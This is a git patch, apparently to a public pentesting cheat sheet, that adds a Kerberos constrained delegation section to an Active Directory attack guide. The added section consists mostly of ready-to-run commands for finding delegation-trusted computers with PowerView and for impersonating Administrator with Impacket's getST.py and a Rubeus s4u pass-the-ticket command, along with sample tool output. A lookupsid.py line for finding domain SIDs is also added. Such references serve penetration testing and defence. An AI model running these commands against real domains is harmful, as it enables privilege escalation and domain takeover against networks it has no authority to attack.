From 74f2dfcccaec7786598a93733ecacadee35c6131 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 23 Feb 2020 21:20:46 +0100 Subject: [PATCH] Kerberos Constrained Delegation --- .../Active Directory Attack.md | 34 ++++++++++++++++++- 1 file changed, 33 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 04b3d51..066e08e 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -49,6 +49,7 @@ - [Trust relationship between domains](#trust-relationship-between-domains) - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking) - [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation) + - [Kerberos Constrained Delegation](#kerberos-constrained-delegation) - [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation) - [Relay delegation with mitm6](#relay-delegation-with-mitm6) - [PrivExchange attack](#privexchange-attack) @@ -1089,6 +1090,9 @@ Prerequisite: ```powershell $ Convert-NameToSid target.domain.com\krbtgt S-1-5-21-2941561648-383941485-1389968811-502 + + # with Impacket + lookupsid.py domain/user:password@10.10.10.10 ``` - Replace 502 with 519 to represent Enterprise Admins - Create golden ticket and attack parent domain. @@ -1098,7 +1102,7 @@ Prerequisite: ### Kerberos Unconstrained Delegation -> The user sends a TGS to access the service, along with their TGT, and then the service can use the user’s TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html +> The user sends a TGS to access the service, along with their TGT, and then the service can use the user's TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html Domain Compromise via DC Print Server and Unconstrained Delegation @@ -1163,6 +1167,34 @@ Then you can use DCsync or another attack : `mimikatz # lsadump::dcsync /user:HA * Ensure sensitive accounts cannot be delegated * Disable the Print Spooler Service +### Kerberos Constrained Delegation + +> Request a Kerberos ticket which allows us to exploit delegation configurations, we can once again use Impackets getST.py script, however, + +Passing the -impersonate flag and specifying the user we wish to impersonate (any valid username). + +```powershell +# Discover +$ Get-DomainComputer -TrustedToAuth | select -exp dnshostname + +# Find the service +$ Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo + +# Exploit with Impacket +$ getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10 +Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation + +[*] Getting TGT for user +[*] Impersonating Administrator +[*] Requesting S4U2self +[*] Requesting S4U2Proxy +[*] Saving ticket in Administrator.ccache + +# Exploit with Rubeus +$ rubeus s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt +``` + + ### Kerberos Resource Based Constrained Delegation Resource-based Constrained Delegation was introduced in Windows Server 2012.